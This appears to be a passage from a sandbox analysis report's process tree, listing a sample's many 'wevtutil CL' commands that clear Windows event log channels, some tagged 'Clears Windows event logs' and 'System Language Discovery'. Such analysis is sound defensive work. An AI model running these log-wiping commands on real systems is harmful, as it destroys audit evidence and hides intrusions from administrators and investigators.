C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppHost/ApplicationTracing"3⤵PID:8080
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppHost/Diagnostic"3⤵PID:8672
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppHost/Internal"3⤵PID:10192
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppID/Operational"3⤵PID:10348
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"3⤵PID:10796
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"3⤵PID:7628
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Deployment"3⤵PID:6228
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Execution"3⤵PID:9964
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Admin"3⤵
- System Location Discovery: System Language Discovery
PID:9548
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Analytic"3⤵PID:10632
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Debug"3⤵PID:6488
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Diagnostics"3⤵PID:9960
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-State/Debug"3⤵PID:6708
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppModel-State/Diagnostic"3⤵PID:7240
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppReadiness/Admin"3⤵PID:8584
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppReadiness/Debug"3⤵PID:7904
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppReadiness/Operational"3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:10672
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppSruProv"3⤵PID:6688
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeployment/Diagnostic"3⤵PID:9412
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeployment/Operational"3⤵PID:7640
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Debug"3⤵
- Clears Windows event logs
PID:9708
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Diagnostic"3⤵PID:11312
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Operational"3⤵PID:8164
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Restricted"3⤵PID:7292
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Analytic"3⤵PID:10984
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Operational"3⤵PID:10040
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"3⤵PID:8916
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"3⤵PID:9804
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"3⤵PID:8496
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"3⤵PID:9444
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"3⤵PID:8632
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"3⤵PID:10664
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"3⤵PID:9692
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"3⤵PID:7444
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"3⤵PID:11380
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"3⤵
- System Location Discovery: System Language Discovery
PID:8768
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"3⤵PID:6148
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Application-Experience/Steps-Recorder"3⤵PID:7152
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppxPackaging/Debug"3⤵PID:8708
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppxPackaging/Operational"3⤵PID:10408
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppxPackaging/Performance"3⤵PID:9048
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AssignedAccess/Admin"3⤵PID:10756
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AssignedAccess/Operational"3⤵PID:10296
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Admin"3⤵PID:8064
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Operational"3⤵PID:10784
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AsynchronousCausality/Causality"3⤵PID:8516
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"3⤵PID:11376
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/GlitchDetection"3⤵PID:7680
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/Informational"3⤵PID:8308
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/Operational"3⤵PID:11768
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/Performance"3⤵
- System Location Discovery: System Language Discovery
PID:8260
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audio/PlaybackManager"3⤵PID:7000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Audit/Analytic"3⤵PID:8268
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"3⤵PID:11616
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"3⤵
- System Location Discovery: System Language Discovery
PID:10876
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUser-Client"3⤵PID:8500
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"3⤵
- Clears Windows event logs
PID:8004
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"3⤵PID:10624
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"3⤵PID:8204
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/HCI"3⤵PID:7816
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/L2CAP"3⤵PID:6360
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Diagnostic"3⤵PID:1840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Performance"3⤵PID:7572
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:9260
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"3⤵PID:8216
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"3⤵PID:11624
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Backup"3⤵PID:9768
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"3⤵PID:7028
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"3⤵PID:6152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Battery/Diagnostic"3⤵PID:7964
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Biometrics/Analytic"3⤵PID:9792
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"3⤵PID:6452
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"3⤵
- System Location Discovery: System Language Discovery
PID:10836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"3⤵PID:6368
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker-Driver-Performance/Operational"3⤵PID:292
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Management"3⤵PID:8412
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Operational"3⤵PID:1732
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BitLocker/Tracing"3⤵PID:1596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"3⤵PID:11064
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:11744
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"3⤵PID:10872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bluetooth-Bthmini/Operational"3⤵PID:11580
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"3⤵PID:10248
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Bluetooth-Policy/Operational"3⤵PID:11400
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"3⤵PID:276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"3⤵PID:4136
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"3⤵PID:7060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheMonitoring/Analytic"3⤵PID:11352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:10056
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"3⤵PID:7080
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CAPI2/Catalog Database Debug"3⤵PID:5180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"3⤵PID:11500
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CDROM/Operational"3⤵PID:8676
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/Analytic"3⤵PID:6616
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/ApartmentInitialize"3⤵PID:10188
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/ApartmentUninitialize"3⤵PID:11576
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/Call"3⤵PID:1588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/CreateInstance"3⤵PID:11824
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/ExtensionCatalog"3⤵PID:10196
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/FreeUnusedLibrary"3⤵PID:7564
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COM/RundownInstrumentation"3⤵PID:10532
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COMRuntime/Activations"3⤵PID:8572
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COMRuntime/MessageProcessing"3⤵PID:7844
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"3⤵PID:11528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"3⤵PID:11840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:11304
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"3⤵PID:6804
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"3⤵PID:11596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Cleanmgr/Diagnostic"3⤵PID:11892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"3⤵PID:7120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CloudStore/Debug"3⤵PID:11272
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CloudStore/Operational"3⤵PID:9816
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"3⤵PID:11800
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"3⤵PID:11884
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"3⤵PID:1860
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"3⤵PID:6424
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"3⤵PID:7084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Analytic"3⤵PID:11792
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Operational"3⤵PID:6400
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Debug"3⤵PID:11748
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Operational"3⤵PID:11280
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Debug"3⤵PID:11492
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Operational"3⤵PID:11684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Debug"3⤵PID:12096
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Operational"3⤵PID:11428
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreApplication/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:11512
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreApplication/Operational"3⤵PID:11936
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreApplication/Tracing"3⤵
- System Location Discovery: System Language Discovery
PID:9872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"3⤵PID:6276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"3⤵PID:11716
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreWindow/Analytic"3⤵PID:12116
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CoreWindow/Debug"3⤵PID:9152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"3⤵PID:6980
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"3⤵PID:6536
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crashdump/Operational"3⤵PID:9736
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"3⤵PID:8252
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-BCRYPT/Analytic"3⤵PID:7636
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-CNG/Analytic"3⤵PID:8980
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"3⤵PID:11812
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Debug"3⤵PID:11860
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Operational"3⤵PID:12188
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-DSSEnh/Analytic"3⤵PID:11300
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-NCrypt/Operational"3⤵PID:8084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"3⤵PID:10588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Crypto-RSAEnh/Analytic"3⤵PID:12100
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"3⤵PID:11920
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"3⤵
- System Location Discovery: System Language Discovery
PID:3652
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DAL-Provider/Analytic"3⤵PID:11544
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DAL-Provider/Operational"3⤵PID:11676
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DAMM/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:11288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"3⤵PID:8660
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DDisplay/Analytic"3⤵PID:7344
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DDisplay/Logging"3⤵
- Clears Windows event logs
PID:11180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DLNA-Namespace/Analytic"3⤵PID:8464
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"3⤵PID:11828
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DSC/Admin"3⤵PID:11520
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DSC/Analytic"3⤵PID:11468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DSC/Debug"3⤵PID:11484
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DSC/Operational"3⤵PID:3836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"3⤵PID:7268
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"3⤵PID:7452
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"3⤵PID:8188
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DXGI/Logging"3⤵
- Clears Windows event logs
PID:11144
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DXP/Analytic"3⤵PID:6292
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Data-Pdf/Debug"3⤵PID:7812
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/Admin"3⤵PID:9996
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/CrashRecovery"3⤵PID:9472
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"3⤵PID:8368
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"3⤵PID:7788
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"3⤵PID:12012
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deduplication/Diagnostic"3⤵PID:8892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deduplication/Operational"3⤵PID:9140
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deduplication/Performance"3⤵PID:9340
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deduplication/Scrubbing"3⤵PID:6608
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Defrag-Core/Debug"3⤵PID:9496
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"3⤵PID:10076
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DesktopActivityModerator/Diagnostic"3⤵PID:5972
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"3⤵PID:12200
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceAssociationService/Performance"3⤵PID:11636
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceConfidence/Analytic"3⤵PID:12156
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceGuard/Operational"3⤵PID:12104
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceGuard/Verbose"3⤵PID:7396
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"3⤵PID:7496
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"3⤵PID:9952
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"3⤵PID:12132
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Admin"3⤵PID:10848
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:11776
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Debug"3⤵
- Clears Windows event logs
PID:7332
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Operational"3⤵PID:7840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"3⤵PID:6604
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"3⤵PID:10284
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceUpdateAgent/Operational"3⤵PID:12180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"3⤵PID:7016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"3⤵PID:10288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Devices-Background/Operational"3⤵PID:12092
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"3⤵PID:11728
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"3⤵PID:7912
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"3⤵PID:10268
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"3⤵PID:9956
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"3⤵PID:4976
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"3⤵
- Clears Windows event logs
PID:10340
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"3⤵PID:11204
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"3⤵PID:9076
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"3⤵PID:8560
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"3⤵
- Clears Windows event logs
PID:6684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"3⤵PID:7760
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"3⤵PID:9440
-
-
